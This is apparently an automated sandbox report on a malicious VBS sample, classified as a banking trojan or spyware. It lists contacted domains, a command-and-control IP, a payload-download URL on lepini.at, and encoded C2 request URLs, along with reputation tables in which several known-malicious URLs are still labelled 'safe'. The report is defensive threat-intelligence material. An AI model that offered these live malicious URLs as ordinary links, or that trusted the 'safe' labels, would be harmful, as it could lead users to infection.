http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://c56.lepini.at//	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://api3.lepini.at/api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://ns.micro/1	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://c56.lepini.at:80/jvassets/xI/t64.dat	0%	Avira URL Cloud	safe
http://ns.adobe.cmg	0%	Avira URL Cloud	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myip.opendns.com	84.17.52.25	true	false		high
c56.lepini.at	47.241.19.44	true	true	12%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	47.241.19.44	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	47.241.19.44	true	false	12%, Virustotal, Browse	unknown
222.222.67.208.in-addr.arpa	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
https://corp.roblox.com/contact/	RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	false		high
http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1	RuntimeBroker.exe, 00000020.00000003.856750140.000001B4FAF45000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://c56.lepini.at/s	explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://www.sogou.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000012.00000002.810095687.000001EF80001000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/develop	RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	false		high
http://www.abril.com.br/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.naver.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://c56.lepini.at//	explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_TermsLC.Hulu	RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://ns.micro/1	RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rambler.ru/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://c56.lepini.at:80/jvassets/xI/t64.dat	explorer.exe, 0000001E.00000000.826002988.000000000A68A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://search.ebay.it/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://ns.adobe.cmg	RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.241.19.44	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321602
Start date:	23.11.2020
Start time:	12:17:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	2Q4tLHa5wbO1.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	5
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winVBS@31/42@10/2
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.255.188.83, 51.104.139.180, 104.83.120.32, 168.61.161.212, 52.155.217.156, 20.54.26.129, 205.185.216.42, 205.185.216.10, 152.199.19.161, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target mshta.exe, PID 7008 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:18:51	API Interceptor	1x Sleep call for process: wscript.exe modified
12:19:28	API Interceptor	10x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
47.241.19.44	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	earmarkavchd.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	2200.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	22.dll	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	mRT14x9OHyME.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	4N9Gt68V5bB5.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	34UO9lvsKWLW.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	csye1F5W042k.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	http://c56.lepini.at	Get hash	malicious	Browse	c56.lepini.at/
	my_presentation_82772.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	208.67.222.222
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	208.67.222.222
	earmarkavchd.dll	Get hash	malicious	Browse	208.67.222.222
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	208.67.222.222
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	208.67.222.222
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	208.67.222.222
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	208.67.222.222
	H58f3VmSsk.exe	Get hash	malicious	Browse	208.67.222.222
	2200.dll	Get hash	malicious	Browse	208.67.222.222
	5faabcaa2fca6rar.dll	Get hash	malicious	Browse	208.67.222.222
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	208.67.222.222
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	208.67.222.222
	YjimyNp5ma.exe	Get hash	malicious	Browse	208.67.222.222
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	208.67.222.222
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	208.67.222.222
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	208.67.222.222
	u271020tar.dll	Get hash	malicious	Browse	208.67.222.222
	Ne3oNxfdDc.dll	Get hash	malicious	Browse	208.67.222.222
	5f7c48b110f15tiff_.dll	Get hash	malicious	Browse	208.67.222.222
	u061020png.dll	Get hash	malicious	Browse	208.67.222.222
myip.opendns.com	earmarkavchd.dll	Get hash	malicious	Browse	84.17.52.25
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	84.17.52.25
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	84.17.52.40
	H58f3VmSsk.exe	Get hash	malicious	Browse	84.17.52.40
	YjimyNp5ma.exe	Get hash	malicious	Browse	84.17.52.40
	4.exe	Get hash	malicious	Browse	84.17.52.10
	PtgzM1Gd04Up.vbs	Get hash	malicious	Browse	84.17.52.10
	Win7-SecAssessment_v7.exe	Get hash	malicious	Browse	91.132.136.164
	Capasw32.dll	Get hash	malicious	Browse	84.17.52.80
	my_presentation_u6r.js	Get hash	malicious	Browse	84.17.52.22
	open_attach_k7u.js	Get hash	malicious	Browse	84.17.52.22
	ZwlegcGh.exe	Get hash	malicious	Browse	84.17.52.22
	dokument9903340.hta	Get hash	malicious	Browse	84.17.52.22
	look_attach_s0r.js	Get hash	malicious	Browse	84.17.52.22
	my_presentation_u5c.js	Get hash	malicious	Browse	84.17.52.22
	presentation_p6l.js	Get hash	malicious	Browse	84.17.52.22
	job_attach_x0d.js	Get hash	malicious	Browse	84.17.52.22
	UrsnifSample.exe	Get hash	malicious	Browse	84.17.52.78
	sample.docm	Get hash	malicious	Browse	84.17.52.78
	3289fkjsdfyu.exe	Get hash	malicious	Browse	185.189.150.37
